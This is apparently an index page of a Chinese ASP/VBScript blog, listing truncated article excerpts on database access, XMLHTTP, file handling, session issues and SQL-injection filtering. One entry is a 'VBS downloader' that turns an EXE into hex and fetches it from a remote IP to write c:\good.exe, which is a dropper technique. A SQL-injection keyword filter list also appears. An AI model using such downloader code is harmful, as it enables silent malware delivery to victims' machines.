asp防sql注入源代码

评论(0)浏览(53)分类:Asp/VBScript
asp防sql注入源代码  asp通用防sql注入源代码,将此段代码放在你执行sql读取数据之前,以便判断客户端提交的内容是否包含恶意注入内容dim spDim Fy_Post,Fy_Get,Fy_getIn,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr,Kill_IP,WriteSql,Fy_postIn'自定义需要过滤的字串,用 | 分隔Fy_getIn = '|#|exec|insert|select|delete|update|%|chr|char|mid|master|truncate|decla..

VB使用WebBrowser读取网页内容

评论(0)浏览(53)分类:Asp/VBScript
VB使用WebBrowser读取网页内容+展开-VBScript'得到当前browser的页面字体内容PublicFunctiongetWebContent()FunctiongetWebContent(browserAsWebBrowser)AsStringDimdocAsObjectDimiAsObjectDimstrHtmlAsStringSetdoc=browser.DocumentForEachiIndoc.AllstrHtml=strHtml&Chr(13)&i.innerTextNextgetWebContent=strHtmlEndFunction上面这个函数可以得到browser中所有文字信息...

VBS下载者

评论(0)浏览(53)分类:Asp/VBScript
VBS下载者使用方法:1.exe2hex.vbs 把exe转成十六进制,放到网络上2.down.vbs http://xxx/demo.htm c:\good.exedemo.htm内容时用exe2hex.vbs转EXE后获得的+展开-VBScriptonerrorresumenextsetarg=wscript.argumentsifarg.count=0thenwscript.quit'codebyNetPatch'cscriptdown.vbshttp://122.136.32.55/demo.htmc:\good.exeSetMail1=CreateObject("CDO.Mes..

如何修改ASP的文件上传大小

评论(0)浏览(53)分类:Asp/VBScript
如何修改ASP的文件上传大小下面的操作以win2003为例子1)先在服务里关闭iisadminservice服务2)找到位于C:\Windows\System32\Inetsrv中的metabase.XML打开【如果系统盘撞到其他的盘,注意系统路径】3)找到ASPMaxRequestEntityAllowed把他修改为需要的值(如5120000即5M),默认为204800,即200K。【默认单位为kb】4)然后重启iisadminservice服务。

asp.net/asp Response IsClientConnected属性

评论(0)浏览(53)分类:Asp/VBScript
asp.net/asp Response IsClientConnected属性  Response IsClientConnected 属性可以在asp/asp.net运行之时,判断客气端是否断开连接,返回true or false。这样避免用户在访问执行时间比较长的页面时,因为用户的重新刷新或关闭页面,服务端程序还在继续执行,导致服务器资源没有被即时释放。IsClientConnected相关说明:IsClientConnected 属性只读,它指示自上次调用 Response.Write 之..

asp检查网址是否可用

评论(0)浏览(52)分类:Asp/VBScript
asp检查网址是否可用  asp如何检查某个网址是否有效或者无效(http状态码不为200)  源代码如下%sub checkurl(url) set xhr=server.CreateObject(Microsoft.XMLHTTP) xhr.open GET,url,false on error resume next xhr.send if err0 then response.Write font color=redurl发生错误:err.Description/fontbr/ err.Clear elseif xhr.status=200 then..

vbscript ascw返回负数解决办法

评论(0)浏览(52)分类:Asp/VBScript
vbscript ascw返回负数解决办法  MSDN文档对AscW的解释:AscW是为使用Unicode字符的32位平台提供的。它返回Unicode(宽型)字符代码,因此可以避免从ANSI到Unicode的代码转换。  按照参考手册的定义,AscW函数应该返回一个字符的Unicode字符编码,但是对某些汉字来说,得到的返回值是负数的。如过字的Unicode编码是36807,但是测试的时候得到-28729。测试代码如下script l..

vbscript实现正则替换参数为函数

评论(0)浏览(51)分类:Asp/VBScript
vbscript实现正则替换参数为函数  vbscript如何使用正则替换,替换参数为函数,可以处理分组中的数据后再返回需要的数据。  javascript的正则替换被替换内容可以为参数,但是vbscript的正则替换没有这种功能,替换成的内容只能为字符串,不能为一个返回字符串的函数。  下面是一个老外写的vbscript实现的替换成的内容可以为一个回调函数博文,原文如下来源:http://gotoc..

asp/vbscript 36进制自动增长序号

评论(0)浏览(51)分类:Asp/VBScript
asp/vbscript 36进制自动增长序号  asp生成0~9,a~z的36进制字符串,运行下面示例需要使用IE核心的浏览器,其他非IE核心浏览器不支持vbscriptscript language=vbscriptfunction getinitstring(l)'初始化指定长度的0字符串 l=l-1 for i=0 to l getinitstring=0getinitstring nextend functionfunction getnextchar(chrcode)'获取下一个字符 if chrcode=57 then&..

asp执行带参数sql语句

评论(0)浏览(50)分类:Asp/VBScript
asp执行带参数sql语句  asp执行带参数的sql语句,需要向sql语句添加参数,源代码如下var conn = Server.CreateObject(ADODB.Connection);conn.ConnectionString = Provider=Microsoft.Jet.OLEDB.4.0;Data Source= + Server.MapPath(Test.mdb);conn.Open();var cmd = Server.CreateObject(ADODB.Command);cmd.ActiveConnection = conn;cmd.CommandType = 1;cmd.Comm..

防sql注入参数处理要点

评论(0)浏览(49)分类:黑客技术
防sql注入参数处理要点  下面的示例代码以VBScript为例,介绍防sql注入参数处理要点,只要在操作数据之前,按照下面的步骤对客户端提交的参数进行验证,一般不会出现sql注入问题,最多是脚本出错,在cint语句那里读数据库,使用连接字符串构成sql语句的,需要执行下面的操作  1)如果参数为字符串,将'替换掉xx=replace(request(xx),',)  2)如果参数为..

在Access里使用查询建立存储过程/视图 并使用ASP执行

评论(0)浏览(49)分类:Asp/VBScript
在Access里使用查询建立存储过程/视图 并使用ASP执行摘要: 本文演示了 使用 Access查询 构造类似于 MSSQL 存储过程的功能, 并在 ASP 中操作插入数据,显示数据功能.目录:1. 在 Access 查询里建表, 名 tt2. 在 Access 查询里新建查询, 内容为:...3. 在 ASP 里使用 tt_insertParm 添加10条记录到 表tt3.1 构造ASP ado 连接函数, fCreateCnn 与 fCloseCnn3.2 组合使用 fCreateCnn, fCloseCnn, tt_inser..

Scripting.FileSystemObject对象详细介绍

评论(0)浏览(48)分类:Asp/VBScript
Scripting.FileSystemObject对象详细介绍  在代码内操作文本文件、文件夹及驱动器。它是脚本运行期库提供的对象之一,对于服务器ASP页面内的VBScript和JScript都有效。如果页面的扩展名为.hta(表示它们是HTA的一部分),它也可用在客户端的IE 5中。本节仅讨论在服务器上的ASP脚本如何使用FileSystemObject对象。 超级文本应用程序(HTA)由指定的“受信任的”页面组成,在页面..

asp往文件中追加重写内容源代码

评论(0)浏览(48)分类:Asp/VBScript
asp往文件中追加重写内容源代码  asp向文件中追加内容,重写文件内容vbscript源代码%'filename:文件名'ct:内容'readwritemode:1只读 2重写 8添加,可以通过设置此参数实现文件的重写或者添加新内容'create:是否创建新文件 ,true/false'encoding:编码,0:ascii -1:unicode -2:系统缺省,中文系统为ANSIfunction WriteFile(filename,ct,readwr..

ado对象总结

评论(0)浏览(48)分类:Asp/VBScript
ado对象总结对于无返回集合的命令(例如delete,update,insert),可以通过设置options中的adexecutenorecords选项提高执行速度。recordset.open source,activeconnection,cursortype,locktype,optionssource:数据源。可以是数据库中的表名,存储的查询或过程,SQL字符串,command对象或试用于提供者的其他命令对象。activeconnection:记录集使用的连接。可以..

asp Server.Transfer和Server.Execute介绍

评论(0)浏览(46)分类:Asp/VBScript
asp Server.Transfer和Server.Execute介绍Server.Transfer和Server.Execute使用方法Server.Transfer 文件名Server.Execute 文件名Server.TTransfer 的作用是在一个页面执行的时候转向到第一个页面的地址.而执行完之后不执行转向前的程序.比如F1.asp程序代码:%response.write 第一个文件的内容brhrServer.Transfer F2.aspresponse.write 第一个文件不执行的内容%F2.asp%=now()%执行过F1...

asp提交复选框checkbox值出现空白

评论(0)浏览(46)分类:Asp/VBScript
asp提交复选框checkbox值出现空白  描述:表单中出现复选框checkbox时,如果勾选了多个复选框,在提交表单时,当动态语言为asp,vbscript时,不管是get还是post提交,得到的值会逗号分隔前面有一个空白符号。其他语言如asp.net-C#,php没有这种问题。  以前早就发现了这个问题,不知道是asp的bug还是什么其他的问题。在2台电脑上测试了下,系统为2003和windows7,得到的结果..

C#/vbscript判断2个样色是否相似

评论(0)浏览(46)分类:Asp.Net/C#/WCF
C#/vbscript判断2个样色是否相似  C#/vbscript判断2个样色是否相似,算法如下RGB是个3维空间,分别计算两个颜色在这个空间的两个坐标点的直线距离,便是两个颜色的色差。色差Cv=SQR(AbsR^2+AbsG^2+AbsB^2)CS=阀值CV=CS为相似CVCS为不相似CS阀值最大为442【RGB(0,0,0)与RGB(255,255,255)的色差】C#t判断2个样色是否相似源代码 /// summary /// 判断颜色是否和主..

VBScript混用与runat=server时脚本语言的执行优先级

评论(0)浏览(45)分类:Asp/VBScript
VBScript混用与runat=server时脚本语言的执行优先级第一点,ASP中JavaScript和VBScript的混用问题。  ASP中JavaScript和VBScript是可以混用的,下面的代码可以说明,在JavaScript中使用的变量可以通过VBScript赋值之后,得到改变。+展开 -HTMLhtmlheadtitlePage1/titlescriptlanguage="JavaScript"alert("JavaScript");vara="JavaScript";alert(a);/scriptscriptlanguage="vbscript"a="vbscript..

asp操作xml文件类库

评论(0)浏览(45)分类:Asp/VBScript
asp操作xml文件类库  asp操作xml文件的类库+展开-VBScriptClassXMLDOMDocumentPrivatefNode,fANodePrivatefErrInfo,fFileName,fOpenDimXmlDom'返回节点的缩进字串PrivatePropertyGetTabStr(byValNode)TabStr=""IfNodeIsNothingThenExitPropertyIfnotNode.parentNodeIsnothingThenTabStr=""&TabStr(Node.parentNode)EndProperty'返回一个子节点对象,ElementOBJ为父..

ASP中XMLHTTP对象参考

评论(0)浏览(45)分类:Asp/VBScript
ASP中XMLHTTP对象参考XMLHTTP对象参考XMLHttpRequest提供客户端同http服务器通讯的协议Dim HttpReq As New MSXML2.XMLHTTP30HttpReq.open "GET", "http://localhost/books.xml", FalseHttpReq.sendMsgBox HttpReq.responseText备注客户端可以通过XmlHttp对象(MSXML2.XMLHTTP.3.0)向http服务器发送请求并使用微软XML文档对象模型Microsoft XML Document Object Model ..

adodb.connection openschema使用说明

评论(0)浏览(44)分类:Asp/VBScript
adodb.connection openschema使用说明adodb.connection openschema使用语法+展开-VBScriptsetconnection=server.createobject("adodb.connection")Setrecordset=connection.OpenSchema(Querytype,[Restrictions],[SchmeID])adodb.connection openschema返回值返回包含模式信息的 Recordset 对象。Recordset 将以只读、静态游标打开。adodb.connection openschema参数说明Querytype:..

关于补ASP上传漏洞,检测JPG文件内容

评论(0)浏览(43)分类:Asp/VBScript
关于补ASP上传漏洞,检测JPG文件内容最近网站被上传传马,十有八九是从ASP无组件上传漏洞进来的。经过一翻苦苦研究,觉得应该对上传后的图片附件进行内容检测,如果发现是伪装图片,立即删除。 网上也找到了一些检测JPG的代码,但是我的附件上传允许文件类型有:JPG、RAR,RAR就被误为不合法了 发这个贴子,是想提两个问题的,希望大家能分别回答: 1、我想知道,检测JPG内容的原理..

asp抓阄随机分配号码源代码

评论(0)浏览(43)分类:Asp/VBScript
asp抓阄随机分配号码源代码  asp抓阄随机分配号码,vbscript随机分配某个数组内的项,得到不重复的循序号。运行本代码需要使用IE浏览器script language=vbscript charset=utf-8Function rndint(byval MinNum,byval MaxNum)'asp生成整数之间的随机数函数 dim tmp if MaxNumMinNum then'交换大小值,防止传递时大小搞反 tmp=MinNum:MinNum=MaxNum:MaxNum=tmp..

asp file对象属性和方法

评论(0)浏览(43)分类:Asp/VBScript
asp file对象属性和方法File 对象  File 对象用于返回有关指定文件的信息。  如需操作 File 对象的相关属性和方法,我们需要通过 FileSystemObject 来创建 File 对象的实例。首先,创建一个 FileSystemObject 对象,然后通过 FileSystemObject 对象的 GetFile 方法,或者通过 Folder 对象的 Files 属性来例示此 File 对象。File 对象的属性和方法属性属性描述Attri..

asp无组件生成缩略图[非生成文件]

评论(0)浏览(42)分类:Asp/VBScript
asp无组件生成缩略图[非生成文件]  网上有不少生成缩略图的ASP组件,如aspjpeg,若你的虚拟空间不支持注册新组件,可能会感觉自己的网站失色不少。心晴不才,结合网上资源写了个无组件生成缩略图程序,仅供参考。  还是先看看基础部分吧。首先,我们知道在页面中显示图片是如下代码:  img src=pic.gif border=0 width=300 height=260  src是图片路径,border控制图片边..

asp如何制作发布webservice-1

评论(0)浏览(42)分类:Asp/VBScript
asp如何制作发布webservice-1  在csdn看到一个问题,说是asp如何制作发布webservice。一般制作发布webservice很少有用到asp的,用百度google搜索asp如何制作发布webservice基本上没有asp的资料,于是改用google搜索how to create web service by asp,搜索到了Creating Web Services with ASP这篇国外的资料,网址:http://www.4guysfromrolla.com/webtech/070401-1.shtml..

Request.ServerVariables参数集介绍

评论(0)浏览(42)分类:Asp/VBScript
Request.ServerVariables参数集介绍Request.ServerVariables(Url)返回服务器地址Request.ServerVariables(Path_Info)客户端提供的路径信息Request.ServerVariables(Appl_Physical_Path)与应用程序元数据库路径相应的物理路径Request.ServerVariables(Path_Translated)通过由虚拟至物理的映射后得到的路径Request.ServerVariables(Script_Name)执行脚本的名称Request.ServerVariabl..

asp非重复关键字替换

评论(0)浏览(42)分类:Asp/VBScript
asp非重复关键字替换function AddToDic(reg,key,Index,str,dic) pattern=[^]*key[^]*|a[^]*[^]*key[^]*\/a reg.Pattern=pattern set matches=reg.Execute(str) for each m in matches dic.Add keyIndex,m.value str=replace(str,m.value,$keyIndex$) Index=Index+1 next set matches=nothingend functionfunction startReplace(str) dim TempStr..

防止ASP Session丢失的方法

评论(0)浏览(42)分类:Asp/VBScript
防止ASP Session丢失的方法也许很多ASP开发者都会遇到这样的情况:在会话期间(session)无故丢失sessio n。换而言之,丢失了SessionID,同样session级的变量也会丢失。   很多session丢失的原因是因为错误的程序或者是错误的虚拟目录结构。   SessionID 的改变有下面几个原因。   原因一:   Netscape的浏览器会认为"/App/user.asp"跟"/app/user.asp"是两个不同的程..